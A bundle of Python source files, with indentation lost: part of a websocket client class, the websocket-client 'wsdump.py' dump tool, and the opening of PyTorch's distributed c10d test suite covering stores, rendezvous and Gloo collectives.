print("websocket unable to parse data: " + text)
raise e
self._log('recv data: %s', data)
self.on_packet(data)
# ws is closed before recv function is called
# For socket.error, see Issue #1608
except (websocket.WebSocketConnectionClosedException, socket.error):
self._disconnect()
# other internal exception raised in on_packet
except: # noqa
et, ev, tb = sys.exc_info()
self.on_error(et, ev, tb)
self._disconnect()
except: # noqa
et, ev, tb = sys.exc_info()
self.on_error(et, ev, tb)
self._disconnect()
@staticmethod
def unpack_data(data: str):
"""
Default serialization format is json.
override this method if you want to use other serialization format.
"""
return json.loads(data)
def _run_ping(self):
""""""
while self._active:
try:
self._ping()
except: # noqa
et, ev, tb = sys.exc_info()
self.on_error(et, ev, tb)
# self._run() will reconnect websocket
sleep(1)
for i in range(self.ping_interval):
if not self._active:
break
sleep(1)
def _ping(self):
""""""
ws = self._ws
if ws:
ws.send("ping", websocket.ABNF.OPCODE_PING)
@staticmethod
def on_connected():
"""
Callback when websocket is connected successfully.
"""
pass
@staticmethod
def on_disconnected():
"""
Callback when websocket connection is lost.
"""
pass
@staticmethod
def on_packet(packet: dict):
"""
Callback when receiving data from server.
"""
pass
def on_error(self, exception_type: type, exception_value: Exception, tb):
"""
Callback when exception raised.
"""
sys.stderr.write(
self.exception_detail(exception_type, exception_value, tb)
)
return sys.excepthook(exception_type, exception_value, tb)
def exception_detail(
self, exception_type: type, exception_value: Exception, tb
):
"""
Print detailed exception information.
"""
text = "[{}]: Unhandled WebSocket Error:{}\n".format(
datetime.now().isoformat(), exception_type
)
text += "LastSentText:\n{}\n".format(self._last_sent_text)
text += "LastReceivedText:\n{}\n".format(self._last_received_text)
text += "Exception trace: \n"
text += "".join(
traceback.format_exception(exception_type, exception_value, tb)
)
return text
def _record_last_sent_text(self, text: str):
"""
Record last sent text for debug purpose.
"""
self._last_sent_text = text[:1000]
def _record_last_received_text(self, text: str):
"""
Record last received text for debug purpose.
"""
self._last_received_text = text[:1000]
|
wsdump.py
|
#!/Users/conradscherb/Documents/v3/env/bin/python3
import argparse
import code
import six
import sys
import threading
import websocket
try:
import readline
except:
pass
OPCODE_DATA = (websocket.ABNF.OPCODE_TEXT, websocket.ABNF.OPCODE_BINARY)
ENCODING = getattr(sys.stdin, "encoding", "").lower()
class VAction(argparse.Action):
def __call__(self, parser, args, values, option_string=None):
if values==None:
values = "1"
try:
values = int(values)
except ValueError:
values = values.count("v")+1
setattr(args, self.dest, values)
def parse_args():
parser = argparse.ArgumentParser(description="WebSocket Simple Dump Tool")
parser.add_argument("url", metavar="ws_url",
help="websocket url. ex. ws://echo.websocket.org/")
parser.add_argument("-v", "--verbose", default=0, nargs='?', action=VAction,
dest="verbose",
help="set verbose mode. If set to 1, show opcode. "
"If set to 2, enable to trace websocket module")
parser.add_argument("-n", "--nocert", action='store_true',
help="Ignore invalid SSL cert")
return parser.parse_args()
class InteractiveConsole(code.InteractiveConsole):
def write(self, data):
sys.stdout.write("\033[2K\033[E")
# sys.stdout.write("\n")
sys.stdout.write("\033[34m" + data + "\033[39m")
sys.stdout.write("\n> ")
sys.stdout.flush()
def raw_input(self, prompt):
if six.PY3:
line = input(prompt)
else:
line = raw_input(prompt)
if ENCODING and ENCODING != "utf-8" and not isinstance(line, six.text_type):
line = line.decode(ENCODING).encode("utf-8")
elif isinstance(line, six.text_type):
line = line.encode("utf-8")
return line
def main():
args = parse_args()
console = InteractiveConsole()
if args.verbose > 1:
websocket.enableTrace(True)
opts = {}
if (args.nocert):
opts = { "cert_reqs": websocket.ssl.CERT_NONE, "check_hostname": False }
ws = websocket.create_connection(args.url, sslopt=opts)
print("Press Ctrl+C to quit")
def recv():
frame = ws.recv_frame()
if not frame:
raise websocket.WebSocketException("Not a valid frame %s" % frame)
elif frame.opcode in OPCODE_DATA:
return (frame.opcode, frame.data)
elif frame.opcode == websocket.ABNF.OPCODE_CLOSE:
ws.send_close()
return (frame.opcode, None)
elif frame.opcode == websocket.ABNF.OPCODE_PING:
ws.pong("Hi!")
return frame.opcode, frame.data
return frame.opcode, frame.data
def recv_ws():
while True:
opcode, data = recv()
msg = None
if not args.verbose and opcode in OPCODE_DATA:
msg = "< %s" % data
elif args.verbose:
msg = "< %s: %s" % (websocket.ABNF.OPCODE_MAP.get(opcode), data)
if msg:
console.write(msg)
thread = threading.Thread(target=recv_ws)
thread.daemon = True
thread.start()
while True:
try:
message = console.raw_input("> ")
ws.send(message)
except KeyboardInterrupt:
return
except EOFError:
return
if __name__ == "__main__":
try:
main()
except Exception as e:
print(e)
|
test_c10d.py
|
import copy
import logging
import math
import operator
import os
import random
import signal
import sys
import tempfile
import threading
import time
import traceback
import unittest
from unittest import mock
from contextlib import contextmanager
from datetime import timedelta
from functools import reduce
from itertools import groupby, product
from sys import platform
import numpy
import torch
import torch.distributed as c10d
if not c10d.is_available():
print("c10d not available, skipping tests", file=sys.stderr)
sys.exit(0)
import torch.distributed as dist
import torch.distributed.algorithms.ddp_comm_hooks.default_hooks as default
import torch.distributed.algorithms.ddp_comm_hooks.powerSGD_hook as powerSGD
import torch.multiprocessing as mp
import torch.nn.functional as F
import torch.testing._internal.common_utils as common
from torch import nn
from torch._six import string_classes
from torch.nn.parallel import DistributedDataParallel
from torch.utils.checkpoint import checkpoint
from torch.testing._internal.common_distributed import (
MultiProcessTestCase,
requires_gloo,
requires_nccl,
requires_nccl_version,
skip_if_lt_x_gpu,
get_timeout,
skip_if_rocm,
simple_sparse_reduce_tests,
skip_if_win32,
create_device,
with_dist_debug_levels,
with_nccl_blocking_wait,
)
from torch.testing._internal.common_utils import (
TestCase,
load_tests,
run_tests,
retry_on_connect_failures,
ADDRESS_IN_USE,
CONNECT_TIMEOUT,
TEST_WITH_TSAN,
IS_WINDOWS,
)
# load_tests from common_utils is used to automatically filter tests for
# sharding on sandcastle. This line silences flake warnings
load_tests = load_tests
if platform == "darwin":
LOOPBACK = "lo0"
else:
LOOPBACK = "lo"
DEFAULT_HOSTNAME = "localhost"
def gpus_for_rank(world_size):
"""Multigpu tests are designed to simulate the multi nodes with multi
GPUs on each node. Nccl backend requires equal #GPUs in each process.
On a single node, all visible GPUs are evenly
divided to subsets, each process only uses a subset.
"""
visible_devices = list(range(torch.cuda.device_count()))
gpus_per_process = torch.cuda.device_count() // world_size
gpus_for_rank = []
for rank in range(world_size):
gpus_for_rank.append(
visible_devices[rank * gpus_per_process : (rank + 1) * gpus_per_process]
)
return gpus_for_rank
def simple_reduce_tests(rank, world_size):
tests = [
(
c10d.ReduceOp.SUM,
torch.tensor([rank + 1.0]),
torch.tensor([float(world_size * (world_size + 1) / 2)]),
),
(
c10d.ReduceOp.PRODUCT,
torch.tensor([rank + 1.0]),
torch.tensor([float(math.factorial(world_size))]),
),
(
c10d.ReduceOp.MIN,
torch.tensor([rank + 1.0]),
torch.tensor([1.0]),
),
(
c10d.ReduceOp.MAX,
torch.tensor([rank + 1.0]),
torch.tensor([world_size]),
),
]
# Generate tests for BAND.
# The bit that is set changes in every iteration to check
# that the output changes accordingly.
for i in range(4):
vin = rank | (1 << i)
vout = 1 << i
tests.append(
(
c10d.ReduceOp.BAND,
torch.tensor([vin], dtype=torch.int32),
torch.tensor([vout], dtype=torch.int32),
),
)
# Generate tests for BOR.
# These emulate a larger world size per iteration by having every
# rank contribute multiple values that are pre-OR'ed.
for i in range(1, 5):
vin = reduce(operator.or_, [rank * i + j for j in range(i)])
vout = reduce(operator.or_, range(world_size * i))
tests.append(
(
c10d.ReduceOp.BOR,
torch.tensor([vin], dtype=torch.int32),
torch.tensor([vout], dtype=torch.int32),
),
)
# Generate tests for XOR.
# These emulate a larger world size per iteration by having every
# rank contribute multiple values that are pre-XOR'ed.
for i in range(1, 5):
vin = reduce(operator.xor, [rank * i + j for j in range(i)])
vout = reduce(operator.xor, range(world_size * i))
tests.append(
(
c10d.ReduceOp.BXOR,
torch.tensor([vin], dtype=torch.int32),
torch.tensor([vout], dtype=torch.int32),
),
)
return tests
def simple_coalesced_reduce_tests(rank, world_size):
return [
(
c10d.ReduceOp.SUM,
[torch.tensor([rank + 1]), torch.tensor([(rank + 1) ** 2])],
[
torch.tensor([float(world_size * (world_size + 1) / 2)]),
torch.tensor(
[float(world_size * (world_size + 1) * (2 * world_size + 1) / 6)]
),
],
),
(
c10d.ReduceOp.PRODUCT,
[torch.tensor([rank + 1.0]), torch.tensor([rank + 2.0])],
[
torch.tensor([float(math.factorial(world_size))]),
torch.tensor([float(math.factorial(world_size + 1))]),
],
),
(
c10d.ReduceOp.MIN,
[torch.tensor([rank + x]) for x in [0.0, 1.0]],
[torch.tensor([0.0]), torch.tensor([1.0])],
),
(
c10d.ReduceOp.MAX,
[torch.tensor([rank + x]) for x in [1.0, 2.0]],
[torch.tensor([world_size]), torch.tensor([world_size + 1.0])],
),
]
def simple_multi_input_reduce_tests(rank, world_size):
return [
(
c10d.ReduceOp.SUM,
[torch.tensor([2 * rank + 0.0]), torch.tensor([2 * rank + 1.0])],
torch.tensor([float(world_size * (2 * world_size - 1))]),
),
(
c10d.ReduceOp.PRODUCT,
[torch.tensor([2 * rank + 1.0]), torch.tensor([2 * rank + 2.0])],
torch.tensor([float(math.factorial(2 * world_size))]),
),
(
c10d.ReduceOp.MIN,
[torch.tensor([2 * rank + 1.0]), torch.tensor([2 * rank + 2.0])],
torch.tensor([1.0]),
),
(
c10d.ReduceOp.MAX,
[torch.tensor([2 * rank + 1.0]), torch.tensor([2 * rank + 2.0])],
torch.tensor([2 * world_size]),
),
]
class StoreTestBase(object):
def _create_store(self, i):
raise RuntimeError("not implemented")
def _test_set_get(self, fs):
fs.add("key", 1)
fs.add("key", 2)
fs.add("key", 3)
fs.set("key0", "value0")
fs.add("key3", 1)
fs.set("key1", "value1")
fs.add("key3", 2)
fs.set("key2", "value2")
fs.add("key3", 3)
fs.add("key3", 4)
fs.add("key3", 5)
fs.add("key3", 6)
self.assertEqual(fs.num_keys(), self.num_keys_total)
self.assertEqual(b"6", fs.get("key"))
self.assertEqual(b"value0", fs.get("key0"))
self.assertEqual(b"value1", fs.get("key1"))
self.assertEqual(b"value2", fs.get("key2"))
self.assertEqual(b"21", fs.get("key3"))
def test_set_get(self):
self._test_set_get(self._create_store())
def test_compare_set(self):
store = self._create_store()
missing_key_result = store.compare_set("key0", "wrong_old_value", "new_value0")
self.assertEqual(b"wrong_old_value", missing_key_result)
store.set("key0", "value0")
self.assertEqual(b"value0", store.get("key0"))
old_value_result = store.compare_set("key0", "wrong_old_value", "new_value0")
self.assertEqual(b"value0", old_value_result)
self.assertEqual(b"value0", store.get("key0"))
new_value_result = store.compare_set("key0", "value0", "new_value0")
self.assertEqual(b"new_value0", new_value_result)
self.assertEqual(b"new_value0", store.get("key0"))
# This is the number of keys used in test_set_get. Adding this as a class
# property instead of hardcoding in the test since some Store
# implementations will have differing number of keys. In the base case,
# there will be 5 keys: key, key0, key1, key2, key3.
@property
def num_keys_total(self):
return 5
class FileStoreTest(TestCase, StoreTestBase):
def setUp(self):
super(FileStoreTest, self).setUp()
self.file = tempfile.NamedTemporaryFile(delete=False)
def _create_store(self):
store = c10d.FileStore(self.file.name, 1)
store.set_timeout(timedelta(seconds=300))
return store
@skip_if_win32()
class HashStoreTest(TestCase, StoreTestBase):
def setUp(self):
super(HashStoreTest, self).setUp()
def _create_store(self):
store = c10d.HashStore()
store.set_timeout(timedelta(seconds=300))
return store
class PrefixFileStoreTest(TestCase, StoreTestBase):
def setUp(self):
super(PrefixFileStoreTest, self).setUp()
self.file = tempfile.NamedTemporaryFile(delete=False)
self.filestore = c10d.FileStore(self.file.name, 1)
self.prefix = "test_prefix"
self.filestore.set_timeout(timedelta(seconds=300))
def _create_store(self):
return c10d.PrefixStore(self.prefix, self.filestore)
def create_tcp_store(addr, world_size=1, wait_for_workers=True):
"""
Creates a TCP store. Retries if the chosen port is already in use.
"""
ports = []
for _ in range(10):
try:
port = common.find_free_port()
ports.append(port)
return c10d.TCPStore(addr, port, world_size, True, wait_for_workers=wait_for_workers)
except RuntimeError as error:
if str(error) == "Address already in use":
continue
raise
raise RuntimeError("Unable to find free port (tried %s)" % ", ".join(ports))
class TCPStoreTest(TestCase, StoreTestBase):
def _create_store(self):
store = create_tcp_store("localhost")
store.set_timeout(timedelta(seconds=300))
return store
def test_address_already_in_use(self):
if sys.platform == "win32":
err_msg_reg = "Only one usage of each socket address*"
else:
err_msg_reg = "^Address already in use$"
with self.assertRaisesRegex(RuntimeError, err_msg_reg):
addr = "localhost"
port = common.find_free_port()
# Use noqa to silence flake8.
# Need to store in an unused variable here to ensure the first
# object is not destroyed before the second object is created.
store1 = c10d.TCPStore(addr, port, 1, True) # noqa: F841
store2 = c10d.TCPStore(addr, port, 1, True) # noqa: F841
# The TCPStore has 6 keys in test_set_get. It contains the 5 keys added by
# the user and one additional key used for coordinate all the workers.
@property
def num_keys_total(self):
return 6
def _test_numkeys_delkeys(self, fs):
# We start off with one init key in the store to coordinate workers
self.assertEqual(fs.num_keys(), 1)
fs.add("key", 1)
fs.add("key", 2)
fs.add("key", 3)
fs.set("key0", "value0")
fs.add("key3", 1)
fs.set("key1", "value1")
self.assertEqual(fs.num_keys(), 5)
fs.delete_key("key")
self.assertEqual(fs.num_keys(), 4)
fs.set_timeout(timedelta(seconds=2))
with self.assertRaises(RuntimeError):
fs.get("key")
fs.delete_key("key0")
fs.delete_key("key3")
self.assertEqual(fs.num_keys(), 2)
fs.set("key4", "value2")
self.assertEqual(fs.num_keys(), 3)
self.assertEqual(b"value1", fs.get("key1"))
self.assertEqual(b"value2", fs.get("key4"))
def test_numkeys_delkeys(self):
self._test_numkeys_delkeys(self._create_store())
def _create_client(self, index, addr, port, world_size, messages):
try:
client_store = dist.TCPStore(addr, port, world_size, timeout=timedelta(seconds=10))
self.assertEqual("value".encode(), client_store.get("key"))
client_store.set(f"new_key{index}", f"new_value{index}")
self.assertEqual(f"next_value{index}".encode(),
client_store.compare_set(f"new_key{index}", f"new_value{index}", f"next_value{index}"))
except Exception:
messages.put('Caught exception: \n{}exiting process with exit code: {}'
.format(traceback.format_exc(), MultiProcessTestCase.TEST_ERROR_EXIT_CODE))
sys.exit(MultiProcessTestCase.TEST_ERROR_EXIT_CODE)
def _multi_worker_helper(self, world_size):
addr = DEFAULT_HOSTNAME
server_store = create_tcp_store(addr, world_size, wait_for_workers=False)
server_store.set("key", "value")
port = server_store.port
messages = mp.Queue()
processes = []
num_proccesses = random.randint(3, 5) if world_size == -1 else world_size
for i in range(num_proccesses):
p = mp.Process(target=self._create_client, args=(i, addr, port, world_size, messages))
processes.append(p)
p.start()
for p in processes:
p.join()
error_message = ""
while not messages.empty():
error_message += messages.get() + "\n"
if any([p.exitcode != 0 for p in processes]):
raise RuntimeError(error_message)
@unittest.skipIf(
IS_WINDOWS, "Skip test for windows due to multiprocessing library error when using windows spawn"
)
def test_multi_worker_with_fixed_world_size(self):
self._multi_worker_helper(5)
@unittest.skipIf(
IS_WINDOWS, "Skip test for windows due to multiprocessing library error when using windows spawn"
)
def test_multi_worker_with_nonfixed_world_size(self):
self._multi_worker_helper(-1)
class PrefixTCPStoreTest(TestCase, StoreTestBase):
def setUp(self):
super(PrefixTCPStoreTest, self).setUp()
self.tcpstore = create_tcp_store("localhost")
self.prefix = "test_prefix"
self.tcpstore.set_timeout(timedelta(seconds=300))
def _create_store(self):
return c10d.PrefixStore(self.prefix, self.tcpstore)
# The PrefixTCPStore has 6 keys in test_set_get. It contains the 5 keys
# added by the user and one additional key used for coordinate all the
# workers.
@property
def num_keys_total(self):
return 6
class MyPythonStore(c10d.Store):
def __init__(self):
super(MyPythonStore, self).__init__()
self.store = dict()
def set(self, key, value):
if not isinstance(key, string_classes):
raise AssertionError("Expected set to be called with string key")
if type(value) is not bytes:
raise AssertionError("Expected set to be called with bytes value")
self.store[key] = value
def get(self, key):
value = self.store.get(key, b"")
if type(value) is not bytes:
raise AssertionError("Expected get to return bytes value")
return value
def add(self, key, value):
new = int(self.store.get(key, 0)) + value
self.set(key, bytes(str(new).encode("utf-8")))
return new
class PythonStoreTest(TestCase):
def setUp(self):
super(PythonStoreTest, self).setUp()
def test_set_get(self):
# If we were to inherit from StoreTestBase and try to use
# its test_set_get function, we would exercise the Python
# API directly, instead of going through the C++ trampoline.
# We care about testing the C++ trampoline, so run the
# equivalent of StoreTestBase.test_set_get from C++.
# See `torch/csrc/distributed/c10d/init.cpp` for the definition
# of this test function.
c10d._test_python_store(MyPythonStore())
class RendezvousTest(TestCase):
def test_unknown_handler(self):
with self.assertRaisesRegex(RuntimeError, "^No rendezvous handler"):
c10d.rendezvous("invalid://")
class RendezvousEnvTest(TestCase):
@retry_on_connect_failures
@requires_nccl()
def test_common_errors(self):
if torch.cuda.device_count() == 0:
raise unittest.SkipTest("No GPUs available, skipping test")
vars = {
"WORLD_SIZE": "1",
"RANK": "0",
"MASTER_ADDR": "127.0.0.1",
"MASTER_PORT": str(common.find_free_port()),
}
class Env(object):
def __init__(self, vars):
self.env_patcher = mock.patch.dict(os.environ, vars, clear=True)
def __enter__(self):
self.env_patcher.start()
def __exit__(self, type, value, traceback):
self.env_patcher.stop()
def without(d, key):
d = d.copy()
d.pop(key)
return d
def withouts(d, keys):
d = d.copy()
for key in keys:
d.pop(key)
return d
with Env(without(vars, "WORLD_SIZE")):
self.assertEqual(None, os.environ.get("WORLD_SIZE"))
with self.assertRaisesRegex(ValueError, "WORLD_SIZE expected"):
gen = c10d.rendezvous("env://")
next(gen)
c10d.init_process_group(backend="nccl", world_size=1)
self.assertEqual(c10d.get_rank(), 0)
self.assertEqual(c10d.get_world_size(), 1)
c10d.destroy_process_group()
with Env(without(vars, "RANK")):
self.assertEqual(None, os.environ.get("RANK"))
with self.assertRaisesRegex(ValueError, "RANK expected"):
gen = c10d.rendezvous("env://")
next(gen)
c10d.init_process_group(backend="nccl", rank=0)
self.assertEqual(c10d.get_rank(), 0)
self.assertEqual(c10d.get_world_size(), 1)
c10d.destroy_process_group()
with Env(withouts(vars, ["RANK", "WORLD_SIZE"])):
self.assertEqual(None, os.environ.get("RANK"))
self.assertEqual(None, os.environ.get("WORLD_SIZE"))
c10d.init_process_group(backend="nccl", rank=0, world_size=1)
self.assertEqual(c10d.get_rank(), 0)
self.assertEqual(c10d.get_world_size(), 1)
c10d.destroy_process_group()
with Env(vars):
c10d.init_process_group(backend="nccl")
self.assertEqual(c10d.get_rank(), 0)
self.assertEqual(c10d.get_world_size(), 1)
c10d.destroy_process_group()
with Env(without(vars, "MASTER_ADDR")):
self.assertEqual(None, os.environ.get("MASTER_ADDR"))
with self.assertRaisesRegex(ValueError, "MASTER_ADDR expected"):
gen = c10d.rendezvous("env://")
next(gen)
with Env(without(vars, "MASTER_PORT")):
self.assertEqual(None, os.environ.get("MASTER_PORT"))
with self.assertRaisesRegex(ValueError, "MASTER_PORT expected"):
gen = c10d.rendezvous("env://")
next(gen)
with Env(without(vars, "WORLD_SIZE")):
self.assertEqual(None, os.environ.get("WORLD_SIZE"))
gen = c10d.rendezvous("env://?world_size={}".format(1))
_, _, size = next(gen)
self.assertEqual(size, 1)
with Env(without(vars, "RANK")):
self.assertEqual(None, os.environ.get("RANK"))
gen = c10d.rendezvous("env://?rank={}".format(0))
_, rank, _ = next(gen)
self.assertEqual(rank, 0)
with Env(withouts(vars, ["RANK", "WORLD_SIZE"])):
self.assertEqual(None, os.environ.get("RANK"))
self.assertEqual(None, os.environ.get("WORLD_SIZE"))
gen = c10d.rendezvous("env://?rank={}&world_size={}".format(0, 1))
_, rank, size = next(gen)
self.assertEqual(rank, 0)
self.assertEqual(size, 1)
@retry_on_connect_failures
def test_nominal(self):
os.environ["WORLD_SIZE"] = "1"
os.environ["MASTER_ADDR"] = "127.0.0.1"
os.environ["MASTER_PORT"] = str(common.find_free_port())
# Single rank
os.environ["RANK"] = "0"
gen0 = c10d.rendezvous("env://")
store0, rank0, size0 = next(gen0)
self.assertEqual(0, rank0)
self.assertEqual(1, size0)
store0.set("key0", "value0")
# check with get
self.assertEqual(b"value0", store0.get("key0"))
@retry_on_connect_failures
def test_logging_init(self):
os.environ["WORLD_SIZE"] = "1"
os.environ["MASTER_ADDR"] = "127.0.0.1"
os.environ["MASTER_PORT"] = str(common.find_free_port())
os.environ["RANK"] = "0"
previous_handlers = logging.root.handlers
c10d.init_process_group(backend="gloo", init_method="env://")
current_handlers = logging.root.handlers
self.assertEqual(len(previous_handlers), len(current_handlers))
for current, previous in zip(current_handlers, previous_handlers):
self.assertEqual(current, previous)
c10d.destroy_process_group()
class RendezvousFileTest(TestCase):
def test_common_errors(self):
with self.assertRaisesRegex(ValueError, "path missing"):
gen = c10d.rendezvous("file://?rank=0&world_size=1")
next(gen)
with self.assertRaisesRegex(ValueError, "rank parameter missing"):
gen = c10d.rendezvous("file:///tmp/foo?world_size=1")
next(gen)
with self.assertRaisesRegex(ValueError, "size parameter missing"):
gen = c10d.rendezvous("file:///tmp/foo?rank=0")
next(gen)
def test_nominal(self):
with tempfile.NamedTemporaryFile(delete=False) as file:
url = f'file:///{file.name.replace(os.path.sep, "/")}?world_size=2'
gen0 = c10d.rendezvous(url + "&rank=0")
store0, rank0, size0 = next(gen0)
self.assertEqual(0, rank0)
self.assertEqual(2, size0)
gen1 = c10d.rendezvous(url + "&rank=1")
store1, rank1, size1 = next(gen1)
self.assertEqual(1, rank1)
self.assertEqual(2, size1)
# Set value on both stores
store0.set("key0", "value0")
store1.set("key1", "value1")
# Cross check with get
self.assertEqual(b"value0", store1.get("key0"))
self.assertEqual(b"value1", store0.get("key1"))
@skip_if_win32()
class RendezvousTCPTest(TestCase):
def create_tcp_url(self):
addr = "localhost"
port = common.find_free_port()
url = "tcp://%s:%d?world_size=%d" % (addr, port, 1)
return url
def test_common_errors(self):
with self.assertRaisesRegex(ValueError, "port number missing"):
gen = c10d.rendezvous("tcp://127.0.0.1?rank=0&world_size=1")
next(gen)
with self.assertRaisesRegex(ValueError, "rank parameter missing"):
gen = c10d.rendezvous("tcp://127.0.0.1:23456?world_size=1")
next(gen)
with self.assertRaisesRegex(ValueError, "size parameter missing"):
gen = c10d.rendezvous("tcp://127.0.0.1:23456?rank=0")
next(gen)
@retry_on_connect_failures
def test_nominal(self):
url = self.create_tcp_url()
gen0 = c10d.rendezvous(url + "&rank=0")
store0, rank0, size0 = next(gen0)
self.assertEqual(0, rank0)
self.assertEqual(1, size0)
# Set value on the single store
store0.set("key0", "value0")
# check with get
self.assertEqual(b"value0", store0.get("key0"))
@retry_on_connect_failures(connect_errors=(CONNECT_TIMEOUT, ADDRESS_IN_USE))
def test_tcp_store_timeout_set(self):
url = self.create_tcp_url()
test_store_timeout = timedelta(seconds=10)
gen0 = c10d.rendezvous(url + "&rank=0", timeout=test_store_timeout)
store0, rank0, size0 = next(gen0)
# this should time out in 10s. If the timeout passed into rendezvous was
# not respected, it will take much longer to timeout.
start = time.time()
with self.assertRaisesRegex(RuntimeError, "Timeout"):
store0.get("nonexistant key")
end = time.time()
time_diff = end - start
self.assertGreater(test_store_timeout.seconds * 10, time_diff)
class TimeoutTest(TestCase):
def _test_store_timeout(self, backend, init_method, c2p):
try:
c10d.distributed_c10d.init_process_group(
backend=backend,
init_method=init_method,
world_size=1,
rank=0,
timeout=timedelta(seconds=1),
)
default_store = c10d.distributed_c10d._get_default_store()
tik = time.time()
with self.assertRaisesRegex(RuntimeError, "Timeout"):
default_store.get("nonexistent key")
tok = time.time()
c10d.destroy_process_group()
c2p.append(float(tok - tik))
except RuntimeError as e:
# catch "Address already in use" error and report it to the main
# thread
c2p.append(e)
def _init_methods(self):
f = tempfile.NamedTemporaryFile(delete=False)
if sys.platform == "win32":
yield "file:///%s" % f.name.replace("\\", "/")
f.close()
else:
yield "file://%s" % f.name
f.close()
yield "tcp://127.0.0.1:%d" % common.find_free_port()
def _test_default_store_timeout(self, backend):
for init_method in self._init_methods():
c2p = []
t = threading.Thread(
target=self._test_store_timeout, args=(backend, init_method, c2p)
)
t.daemon = True
t.start()
t.join(5)
self.assertEqual(1, len(c2p))
if isinstance(c2p[0], float):
# waiting time should be 1s, use 3s to rule out false alarm
self.assertGreater(3, c2p[0])
elif isinstance(c2p[0], RuntimeError):
# let @retry_on_connect_failures handle the error
raise c2p[0]
else:
raise RuntimeError("Unexpected type {}".format(type(c2p[0])))
@requires_nccl()
@retry_on_connect_failures
def test_default_store_timeout_nccl(self):
if torch.cuda.device_count() == 0:
raise unittest.SkipTest("No GPUs available, skipping test")
self._test_default_store_timeout("nccl")
@requires_gloo()
@retry_on_connect_failures
def test_default_store_timeout_gloo(self):
self._test_default_store_timeout("gloo")
@requires_gloo()
@unittest.skipIf(
TEST_WITH_TSAN,
"TSAN is not fork-safe since we're forking in a multi-threaded environment",
)
class ProcessGroupGlooTest(MultiProcessTestCase):
def setUp(self):
super(ProcessGroupGlooTest, self).setUp()
# For Windows platform, Python does not support fork, change it to spawn here.
if sys.platform == "win32":
self._spawn_processes()
else:
self._fork_processes()
def opts(self, threads=2):
opts = c10d.ProcessGroupGloo.Options()
opts.timeout = 5.0
opts._devices = [create_device(interface=LOOPBACK)]
opts._threads = threads
return opts
def test_multi_device_constructor(self):
store = c10d.FileStore(self.file_name, self.world_size)
opts = c10d.ProcessGroupGloo.Options()
opts.timeout = 5.0
opts._devices = [
create_device(interface=LOOPBACK),
create_device(interface=LOOPBACK),
]
pg = c10d.ProcessGroupGloo(store, self.rank, self.world_size, opts)
# Execute 2x the number of operations to ensure we use every device.
for work in [pg.allreduce(torch.ones(i + 1)) for i in range(4)]:
work.wait()
def test_empty_tensors(self):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(store, self.rank, self.world_size, self.opts())
xs = [torch.FloatTensor([])]
pg.broadcast(xs).wait()
self.assertEqual(0, xs[0].numel())
def test_broadcast_checks(self):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(store, self.rank, self.world_size, self.opts())
t1 = torch.zeros([1], dtype=torch.float32)
t2 = torch.zeros([1], dtype=torch.float64)
t3 = torch.zeros([2], dtype=torch.float32)
with self.assertRaisesRegex(ValueError, "invalid root rank"):
opts = c10d.BroadcastOptions()
opts.rootRank = -1
opts.rootTensor = 0
pg.broadcast([t1], opts)
with self.assertRaisesRegex(ValueError, "invalid root rank"):
opts = c10d.BroadcastOptions()
opts.rootRank = self.world_size
opts.rootTensor = 0
pg.broadcast([t1], opts)
with self.assertRaisesRegex(ValueError, "invalid root tensor"):
opts = c10d.BroadcastOptions()
opts.rootRank = self.rank
opts.rootTensor = -1
pg.broadcast([t1], opts)
with self.assertRaisesRegex(ValueError, "invalid root tensor"):
opts = c10d.BroadcastOptions()
opts.rootRank = self.rank
opts.rootTensor = 1
pg.broadcast([t1], opts)
with self.assertRaisesRegex(ValueError, "invalid root tensor"):
opts = c10d.BroadcastOptions()
opts.rootRank = self.rank
opts.rootTensor = 0
pg.broadcast([], opts)
with self.assertRaisesRegex(ValueError, "invalid tensor type"):
opts = c10d.BroadcastOptions()
opts.rootRank = self.rank
opts.rootTensor = 0
pg.broadcast([t1, t2], opts)
with self.assertRaisesRegex(ValueError, "invalid tensor size"):
opts = c10d.BroadcastOptions()
opts.rootRank = self.rank
opts.rootTensor = 0
pg.broadcast([t1, t3], opts)
def _test_broadcast_basics(self, fn):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(store, self.rank, self.world_size, self.opts())
def broadcast(xs, rootRank, rootTensor):
opts = c10d.BroadcastOptions()
opts.rootRank = rootRank
opts.rootTensor = rootTensor
work = pg.broadcast(xs, opts)
work.wait()
# Every rank is root once
for i in range(self.world_size):
# Run with 1 input tensor
x = fn(torch.tensor([self.rank]))
broadcast([x], i, 0)
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(torch.tensor([i]), x)
# Run with 2 input tensors
num = 2
for j in range(num):
xs = [
fn(torch.tensor([self.rank * num + 0.0])),
fn(torch.tensor([self.rank * num + 1.0])),
]
broadcast(xs, i, j)
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(torch.tensor([i * num + j]), xs[0])
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(torch.tensor([i * num + j]), xs[1])
# Test overloaded convenience function
x = torch.tensor([self.rank + 1.0])
work = pg.broadcast(x, root=0)
work.wait()
self.assertEqual(torch.tensor([1.0]), x)
def test_broadcast_basics(self):
self._test_broadcast_basics(lambda t: t.clone())
@skip_if_lt_x_gpu(2)
def test_broadcast_basics_cuda(self):
self._test_broadcast_basics(lambda t: t.clone().cuda())
def _test_broadcast_stress(self, inputs):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(
store, self.rank, self.world_size, self.opts(threads=8)
)
work_handles = [
pg.broadcast(inputs[i], root=(i % self.world_size))
for i in range(len(inputs))
]
for i, work_handle in enumerate(work_handles):
work_handle.wait()
self.assertEqual(
torch.tensor([(i * self.world_size) + (i % self.world_size)]),
inputs[i],
msg=("Mismatch in iteration %d" % i),
)
def test_broadcast_stress(self):
inputs = [torch.tensor([i * self.world_size + self.rank]) for i in range(1000)]
self._test_broadcast_stress(inputs)
@skip_if_lt_x_gpu(2)
def test_broadcast_stress_cuda(self):
inputs = [
torch.tensor([i * self.world_size + self.rank]).cuda() for i in range(1000)
]
self._test_broadcast_stress(inputs)
def test_allreduce_checks(self):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(store, self.rank, self.world_size, self.opts())
t1 = torch.zeros([1], dtype=torch.float32)
t2 = torch.zeros([1], dtype=torch.float64)
t3 = torch.zeros([2], dtype=torch.float32)
